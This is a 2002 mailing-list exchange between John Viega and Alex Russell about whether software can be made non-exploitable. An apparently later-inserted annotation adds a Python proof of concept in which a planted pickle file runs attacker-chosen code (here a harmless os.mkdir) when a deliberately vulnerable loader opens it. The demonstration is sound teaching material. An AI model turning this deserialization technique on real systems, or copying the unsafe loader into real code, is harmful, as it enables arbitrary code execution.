From: John Viega (viega_at_list.org)
Date: Fri Dec 27 2002 - 14:57:50 CST
Oh, come on. Let's not argue about stupid semantic issues when we're
all on the same page. It's quite clear that one *can* build a piece of
software that is not in and of itself exploitable through a flaw in the
software. By that, I mean "you can't leverage remote resources for
your own gain", which is what most people are talking about when they
ask the question in the first place.
Saying that the system the software is part of still has risks such as DoS
or physical attacks is true and obvious, but it is not really germane
given the question, because those are not issues with the software
application itself. For example, there aren't many techniques at the
application level that are effective at countering DoS attacks, etc.
I'm not furthering any sort of myth; I was pointing out that the reality
of the situation is worse than people think. If you read Jeremy Epstein's
comments as well, you'll see that environmental concerns with regard to
the software (e.g., Operating System and dependent libraries) make
things even harder.
On Friday, December 27, 2002, at 04:54 PM, Alex Russell wrote:
> On Friday 27 December 2002 11:43, John Viega wrote:
>> Of course it's possible to write something that's not exploitable.
>> However, it's tougher than most people think.
> As an unqualified statement, this is patently false. If you had said
> "given a fixed environment, it's possible to develop an application that
> provides protection from circumvention of well-defined security
> restrictions against a certain type of attack or attacker," then I might
> take it seriously. Until then, you're just furthering the myth of
> attainable total security (e.g., is survivability in thermonuclear war a
> requirement of your app? is that appropriate? if your app fails in this
> case, has it been "exploited" or DoS'd, or is that an accepted failure
> mode?)
>> For example, I've seen
>> applications that the authors assumed were not networked whatsoever,
>> and had no special local privilege. However, if the files they read
>> and wrote were stored on a remote file system such as an SMB mount,
>> then their otherwise non-networked program was completely exploitable.
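The SMB example above boils down to an application trusting file contents because it assumes they are local. A minimal sketch of that failure mode (the names and the pickle-based settings format are purely illustrative assumptions, not anyone's actual code from this thread):

```python
import os
import pickle
import tempfile

# Hypothetical app code: it assumes its settings file is local and
# trusted, so it happily unpickles whatever it finds there.
def load_settings(path):
    with open(path, "rb") as f:
        # pickle executes whatever the file's author arranged for
        return pickle.load(f)

# What someone who can write that file (e.g., via a writable SMB share)
# might plant: __reduce__ makes pickle call os.mkdir(marker) on load.
class EvilSettings:
    marker = os.path.join(tempfile.gettempdir(), "smb_demo_marker")

    def __reduce__(self):
        return (os.mkdir, (self.marker,))

if os.path.isdir(EvilSettings.marker):      # clean up from earlier runs
    os.rmdir(EvilSettings.marker)

settings_path = os.path.join(tempfile.gettempdir(), "settings.pkl")
with open(settings_path, "wb") as f:
    f.write(pickle.dumps(EvilSettings()))   # "attacker" writes the file

load_settings(settings_path)                # "victim" merely loads settings...
print(os.path.isdir(EvilSettings.marker))   # ...and attacker code has run
```

Note that the program itself never touches the network; its exploitability depends entirely on who can write the file, which is exactly what changes when the path turns out to be a remote mount.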
> Secure design can often compartmentalize enough to handle a changing
> environment, but that's something of a desirable side effect of good
> design, not a strong property. Change the environment enough (or change
> abstractions that authors don't question, like the remote filesystem),
> and anything will break. How it breaks is the important question, and
> one I don't think we spend enough time discussing over the incessant
> din of those looking for a security silver bullet.
> Alex Russell